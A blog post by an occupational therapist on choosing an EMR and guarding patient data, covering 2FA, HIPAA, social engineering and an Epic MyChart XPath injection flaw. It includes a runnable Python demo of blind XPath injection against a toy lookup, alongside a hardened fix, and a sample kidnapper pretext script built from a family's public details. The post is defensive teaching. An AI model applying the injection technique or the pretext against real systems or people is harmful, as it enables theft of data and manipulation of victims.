The Best EMRs for Occupational Therapy Practice – My Vulnerability Concerns

What is the best EMR to use for occupational therapy? What are some concerns that you should have in regards to vulnerabilities?

EMR Interest and Adoption

There is a growing concern for the vulnerabilities in EMR used by occupational therapy practitioners. A frequent question asked on occupational therapy groups for entrepreneurs is, “what EMR software should I use?” Someone on the Internet is probably wondering this and about to make another post asking the same question right now.

“emr” on Google Trends

When it comes to EMR software, I am guessing that security and privacy are not the number 1 features that occupational therapy practitioners look for. In fact, security and privacy are probably not features that people look for in technology in general. The primary objective of Internet use and software is usually to perform a function (e.g., a calculator app calculates), find an answer (e.g., a Google search returns the answer), entertainment (e.g., Netflix or social media), or money (e.g., Etsy sellers).

Researchers have wondered why this is the case, for example in the adoption of password managers (PM) by the general public. If you do not use a password manager, I highly recommend that you do. It is a game-changer. I have been using an open-source and free one (KeePass/MacPass) for many years now. Why am I bringing up password managers?

An analogy can be made between password managers and EMRs. They are both software (stored locally [single device], on a local network [LAN], or in the cloud [web]). They both require authentication to gain access to a database (a “master” password for a PM; a password or badge-based single sign-on for an EMR). They both contain sensitive information (passwords for PMs; patient charts with medical information for EMRs). And there are as many options for PMs as there are for EMRs. Just as it can be difficult to choose a password manager from the App Store or to install on your operating system, it can be even more difficult to find an EMR. EMRs are inherently complex, as they store all kinds of patient information including names, demographics, contact information, medical history, treatment notes, and much more.

Gasti and Rasmussen audited the password managers that were available to them around 2012. They looked at popular software such as the built-in managers of Internet browsers (Google Chrome and Mozilla Firefox) as well as dedicated tools such as 1Password, KeePass, and RoboForm. The majority of this software was susceptible to at least one vulnerability, including unauthorized modification of the password database. [1]

Research and Practice

Gasti and Rasmussen note that in practice, in addition to the inherent vulnerabilities of the software and its database format (which we as consumers control through our choice of product), a second variable is the storage mechanism and host of the PM. My analogy applies to EMRs as well: how the EMR is stored and where it is hosted matters. Gasti and Rasmussen classify storage and hosting into 3 classes: from completely insecure (unencrypted databases), to somewhat secure, to most secure. Most of you will probably fall in the somewhat-to-most-secure range.

Computing has become more complicated because of the wide adoption of cloud computing. Before the Internet, data was stored locally on the computer. Computers may be connected to a local network (LAN) via Ethernet or Wi-Fi and still not be exposed to the Internet. If the administrator modifies the firewall, for example by forwarding ports to a server, those computers may become exposed to the Internet. Now, with the cloud, users may bypass all of this and upload or submit their data directly to computers in the hands of a third party. If you think about it, that can be kind of a red flag, but we are all doing it with services such as Gmail, Google Docs, Facebook, Dropbox, and the growing list goes on and on.

Essentially, the 3 security classes of storage apply to every single device, whether it is local (you can physically touch it), reachable remotely over the LAN or the Internet, or in the cloud. Note that I am not anti-cloud, but the proper precautions and research should be done before choosing a platform, and you should understand its implications. You may think I am going off on a tangent, but I literally read posts on an OT Entrepreneur Facebook group about occupational therapy practitioners using Google Docs as their “EMR” solution. Not a good idea: a consumer Google account is not HIPAA compliant, because Google does not sign a Business Associate Agreement (BAA) for it, and without a BAA you have no business storing protected health information (PHI) there. Imagine being audited by the HHS Office for Civil Rights (the “HIPAA folks”) and telling them you used Google Docs for documentation. Probably doesn’t make for a good case in your favor.

Technically, no one deployment model is inherently more secure than another, cloud or otherwise. For example, if a user leaves their computer logged in and steps away for a minute, or does not use a log-on password for the EMR stored on that computer, that setup is less secure than EMR software in the cloud with a strong password and 2-factor authentication (2FA) enabled.

An EMR with 2FA?

Most users are familiar with 2FA by now, e.g., getting a text message to verify your identity after entering a password to log onto a website such as your bank. By the way, using a mobile number for 2FA is considered the least secure form of 2FA compared to, say, Google Authenticator or Authy, but it is better than no 2FA at all. This is because your phone number can be hijacked through social engineering: an attacker talks your carrier into moving your number to a SIM they control (a “SIM swap”), and from then on the 1-time codes sent to your number land in their hands instead of yours. Interesting, isn’t it?

Tip #1: Look for an EMR with 2FA, especially if it is hosted in the cloud, and prefer an authenticator app over SMS codes. If using a local database EMR, be sure to lock your workstation. Make backups of the database, but make sure the backups are encrypted and the backup solution has 2FA enabled as well.

Human Motivation

“Security is considered a secondary task by end-users. [2] That being so, they try to avoid engaging with security, especially if it gets in the way of their primary goal. [3]”

Why are we doing all this in the first place? I love talking about this because it is very “OT” and inherent to the heart and soul of the profession. Why do we do anything? Personal motivation is influenced by intrinsic and extrinsic factors. Why do people use password managers? They (as was I) are probably tired of memorizing ever more passwords, as the services and programs they use require them to be more complex (due to more sophisticated attackers and faster hardware for brute-forcing passwords). And for occupational therapy practitioners, paper charts are being phased out in favor of EMRs. The motivation to find a good EMR is likely to make your life easier as an OT practitioner: functionality, saving time, cutting costs, maybe meeting compliance. I doubt it is security and privacy.

HIPAA Compliance

But OT practitioners need to comply with HIPAA. And EMRs especially need to be “HIPAA compliant”, as do popular solutions such as Zoom video conferencing. I get that new OT entrepreneurs don’t have any or a lot of money to spend on EMR software. But this is when you should really balance cost savings vs. security and privacy. You wouldn’t use an operating system if it was full of security holes even if it was cheap, so the same applies here.

Real-World Vulnerabilities & Exploits

Even products with a strong security reputation such as the iPhone have been susceptible to security vulnerabilities for many years. Check this article out if you have not heard of it: “How China turned a prize-winning iPhone hack against the Uyghurs”. Reportedly (depending on who you ask), China, as a state actor, has been spying on the Uyghurs through an iPhone vulnerability as part of its controversial genocide against them and its use of ‘concentration camps’.

The “Best”

I have an Android phone and I got so much judgment for it in OT school, especially for the camera as everyone had an iPhone. I have and use Apple products myself.

It’s ironic because my wife complains that her iPhone X photo quality is “garbage” compared to my 3-year-old Samsung Galaxy that I got around the same time. To this day, my camera quality holds its own against the newest iPhones. Unfortunately, she is locked into the Apple ecosystem (which I understand and am partly responsible for) but really wants a Pixel (the best camera phone in my opinion). My MacBook Air webcam (as I have been saying for many years) is even more “garbage”. People are finding this out now likely due to the pandemic and the widespread use of Zoom and these low-quality MacBook webcams. Why am I bringing this up? Popular and mainstream do not always equate to secure and private or even “best”.

Apple Myths

So when people tell me that Macs can’t get hacked or that iPhones are more secure than Android, that is just a myth, as seen with the Uyghur iPhone hack controversy. Just as with EMR software, it’s not about the device or software alone, but how you use it: user behavior and best practices, how securely it is coded, who finds the vulnerabilities first (hopefully good actors and researchers), how quickly patches are provided for those vulnerabilities, AND how promptly users install them.

If you leave your iPhone without a passcode, or your 2-year-old looks over your shoulder while you are unlocking it, memorizes the passcode, and later uses it to delete all your apps, the iPhone might as well be considered “insecure”. Now replace the 2-year-old with a stranger in your OT clinic with bad intentions. Don’t think it couldn’t happen to you because you are a “small fish” in the industry. It’s not that far from reality. A social security number is a social security number at the end of the day in the hands of a hacker.

Tip #2: Security and privacy should be high on the list of priorities when looking for an EMR. A HIPAA breach could cost you or your company thousands of dollars, embarrassment, and bad PR. If Sony, Equifax, and many other well-known companies have been hacked, so can you and your EMR software. You may think you are not an attractive target for hackers, but you are. The data you store in your EMR software is highly valuable on the black market (e.g., dark web marketplaces), as it contains addresses, social security numbers, and more.

Tip #3: Reflect on how you use computers and technology in general. Do you expose yourself to certain vulnerabilities through your behaviors, practices, or choice of products? Do you install software updates when they come out, or do you keep pushing them off?

Social Engineering

Do you expose yourself unintentionally to social engineering? Examples: do you post your favorite Disney characters as decals on your car? Is your child’s name or school on a bumper sticker, or on a lawn sign for their “reading achievements”? Do you have a framed picture of your children, with their names, sitting on a desk that is left unattended? Guess what: some of these are probably answers to your “security questions” for password recovery, part of your password, or related to it one way or another. It doesn’t necessarily take a single breach to expose your or your patients’ information; it can take several steps that build up a body of information. With some dedication, a stranger could gain access to your EMR and the information it contains. Reflect and change your behavior.

Tip #4: I highly recommend that you remove those bumper stickers and lawn signs that contain your children’s names or where they go to school.

Social engineering proof of concept, from a would-be kidnapper:
“Heyyyy Bobby (your child’s name, displayed on your lawn), I am friends with your Mom (your name, from your OT business) and work with her at ABC Rehab Clinic. I went to OT school with her at (school name on your bumper sticker). I also know your Dad, Jerry (from your husband’s landscaping company name), who does work on my house. Your mom asked me to pick you up today and drop you off at her work because she is busy seeing a lot of patients.”
All of this is information that can be gathered easily through social engineering if you are not careful.

Verdict: The Best EMR Software

Most people will not like this answer, but there is no “best” EMR software. Just as each client is unique and occupational therapists should be client-centered, there is no “one” EMR that works for the masses. Each practitioner may have their own unique use case. For example, using a solution like Epic may be “overkill” for a small clinic, which does not need a database for lab values, doctor’s orders, multiple types of allied health professionals with varied levels of access, etc.

I looked into the popular Epic EMR software. Boy, EMR is a big business! On January 16, 2013, NYC Health + Hospitals (H+H) entered into a 15-year, $302 million contract with Epic Systems Corporation (Epic Systems) to replace H+H’s then-20-year-old electronic medical record (EMR) system. [4]

How “epic” is Epic Systems and is it the best of the best?

Epic Systems Corporation MyChart “is a web portal offered by most Epic healthcare organizations that gives you controlled access to the same Epic medical records your doctors use and provides convenient self-service functions that reduce costs and increase satisfaction.”

The MyChart software contained (at one point anyway) an XPath injection due to lack of sanitization of the GET parameter “topic”. A remote attacker could read the contents of an XML document containing static display strings, such as field labels, via the topic parameter to help.asp. [5] They have probably patched this by now.
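The bug class is worth seeing in code. What follows is an added example of my own, not Epic’s code and not the exploit-db entry: a toy help-topic lookup that splices a query parameter into an XPath expression the way the advisory describes, a blind (boolean-based) injection against it, and a hardened version. The XML document, the hidden config node, the query shape and the guess list are all assumptions for illustration, and the example goes beyond the page’s description by showing the generic oracle technique rather than the specific strings disclosed there. It uses Python’s standard-library ElementTree, which supports only a subset of XPath, so it runs without extra packages.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample document (not Epic's data): public help topics, plus a
# node the help page was never meant to expose.
HELP_XML = """<help>
  <topic id="login"><label>Sign in with your MyChart username</label></topic>
  <topic id="billing"><label>Pay your bill online</label></topic>
  <config><smtp_password>hunter2</smtp_password></config>
</help>"""

ROOT = ET.fromstring(HELP_XML)


def lookup_vulnerable(topic: str) -> str:
    """Vulnerable: the 'topic' query parameter is spliced into the XPath."""
    query = f"./topic[@id='{topic}']"
    matches = ROOT.findall(query)
    if not matches:
        return "No such topic"
    # A successful injection can select a node that is not a <topic>; the
    # different response text is the oracle an attacker watches for.
    return matches[0].findtext("label", default="(no label)")


def oracle_guess_secret(candidates):
    """Boolean-based blind XPath injection against lookup_vulnerable().

    Each payload closes the @id predicate with a known-good topic, walks up
    to the document root, down to the secret node, and tests one guess with
    [.='...']; the closing '] that the application appends completes the
    expression. The response differs only when the guess is right.
    (Guesses must not contain a quote, which would break the expression.)"""
    for guess in candidates:
        payload = f"login']/../config/smtp_password[.='{guess}"
        if lookup_vulnerable(payload) != "No such topic":
            return guess
    return None


# Topic identifiers are plain tokens, so an allowlist is the first defence.
TOPIC_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")


def lookup_safe(topic: str) -> str:
    """Hardened: allowlist the identifier, then compare in code, not in XPath,
    so user input never becomes part of the query language."""
    if not TOPIC_ID.fullmatch(topic):
        return "No such topic"
    for elem in ROOT.iterfind("./topic"):
        if elem.get("id") == topic:
            return elem.findtext("label", default="(no label)")
    return "No such topic"


if __name__ == "__main__":
    wordlist = ["password", "letmein", "hunter2", "changeme"]  # constructed
    print("normal lookup:", lookup_vulnerable("login"))
    print("leaked via oracle:", oracle_guess_secret(wordlist))
    print("hardened lookup with payload:",
          lookup_safe("login']/../config/smtp_password[.='hunter2"))
```

Full XPath 1.0 engines (libxml2 via lxml, or the .NET XPath classes an ASP application would use) also offer substring() and string-length(), which is what turns this whole-value guess into practical character-by-character extraction. In lxml the right fix for values that must stay free text is to pass them as XPath variables, e.g. tree.xpath("//topic[@id=$id]", id=topic), rather than quoting them by hand.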

In more recent Epic EMR recent news:

According to a press release shared on the health system’s website, a user took advantage of a vulnerability in Epic’s scheduling tool, allowing 2,700 people to “cut in line” and register for unauthorized vaccine appointments. Those appointments have since been canceled. [6]

Thankfully Epic has a security vulnerability or concern reporting page. I wonder if there is something more epic than Epic, maybe it is called Uber. Oh wait…that name’s already taken. Don’t get me wrong, I am not dissing Epic as it is actually a pretty good EMR solution from what I hear. However, just as I highlighted with the iPhone vulnerability, any EMR software is susceptible to attacks, vulnerabilities, and exploits.

Even the “best” EMR is vulnerable to security and privacy issues, and to COVID-19 line cutters, as we have come to find out.

NEVER take the first recommendation (or even the most common recommendation, e.g., in Facebook comments) from a stranger on the Internet, because they could simply be earning a referral for the software or pitching it, and have a financial conflict of interest. I see this all the time with paid NBCOT exam prep solutions. It’s kind of sad. Shoutout to OT Miri, she’s the best.

Consider asking a colleague, but do your own due diligence:

  • Research the software: How long has it been out? Who made it? What is their reputation? Is it just a random program from the Internet by someone who had a great idea? Who or which companies use it? What operating systems is it available on? Just because it is in the Apple Mac App Store does not mean it is safe and secure.
  • Read the terms of use and privacy policy. Yes, I know you never read these, but when it comes to HIPAA, it’s no time to take shortcuts just to get to practice as an OT. What information gets shared and with whom? Does the software “phone home” to a server for no reason?
  • Look for “HIPAA compliant” software, and ask the vendor whether they will sign a Business Associate Agreement (BAA). If they won’t, you cannot use them for patient data in compliance with HIPAA, whatever their marketing says.
  • The EMR should come with a backup solution if it is stored locally, or you should implement one yourself using the ‘3-2-1 backup’ rule: three copies of your data, on two different types of media, with one copy off-site.
  • Download and try a demo or trial and try different software out for a week. Does it crash or have a lot of bugs? Then it’s time to move on.
  • Remember to delete your user data if you discontinue using a subscription-based EMR.
  • See what works and what does not when comparing EMR software and prioritize security and privacy.
  • A good piece of software (whether open-source or closed-source) should have frequent updates. Many vendors post changelogs publicly on the Internet. If your EMR has not been updated since the 1990s, that’s a huge red flag; it might as well be open access for hackers at that point (in my opinion). *Points at Meditech.
  • It does not stop with the EMR software: secure the device(s) as well and update them when time allows. Most people hate Windows 10 because of its automatic updates, but this actually works around the poor habits most users have around installing updates themselves.
  • What is the best EMR software one day could literally be second best the next, because of how fast the technology world is moving.
  • Consider EMRs that use non-proprietary databases, or that can at least export your data in a standard format that can be transferred to another EMR. Otherwise, you will be locked into an old EMR solution because you don’t want to recreate your patient database from scratch. That sounds like a nightmare!
  • Consider getting HIPAA breach (cyber liability) coverage as a rider on your professional insurance in case of a breach. It’s not that expensive, even for businesses; I pay about $400/yr for peace of mind.

Best Practices for ALL OTs

  • Secure your workstation and use an unguessable password.
  • If you can sign on with your badge, never leave the badge unattended (e.g., in your car) or lend it to anyone.
  • Update your operating system and software.
  • Be careful with links on websites and in e-mails that try to harvest personal information such as logins and passwords (phishing).
  • Do not write your passwords down; use a password manager (preferably one that does not store your vault in the cloud, but even a cloud-based one is preferable to reusing a weak password across different platforms).
  • Pay attention to what you reveal in public and how you handle your devices around strangers (who may use social engineering to gain access to the EMR or the device you are using).

Stay safe and stay protected.

This reminds me, I have to remove my school name’s license plate cover from my car (oops!)

References

[1] Gasti, P., & Rasmussen, K. B. (2012). On the security of password manager database formats. In European Symposium on Research in Computer Security (ESORICS 2012), pp. 770–787. Springer, Berlin, Heidelberg.
[2] Whitten, A., & Tygar, J. D. (1999). Why Johnny can’t encrypt: A usability evaluation of PGP 5.0. In Proceedings of the 8th USENIX Security Symposium.
[3] Beautement, A., Sasse, M. A., & Wonham, M. (2008). The compliance budget: Managing security behaviour in organisations. In NSPW 2008, pp. 47–58.
[4] https://www.nychealthandhospitals.org/pressrelease/hhc-signs-contract-for-new-electronic-medical-record-system-to-span-citys-entire-public-hospital-system/
[5] https://www.exploit-db.com/exploits/44098
[6] https://www.healthcareitnews.com/news/health-system-flags-vulnerability-epic-covid-19-vaccine-scheduler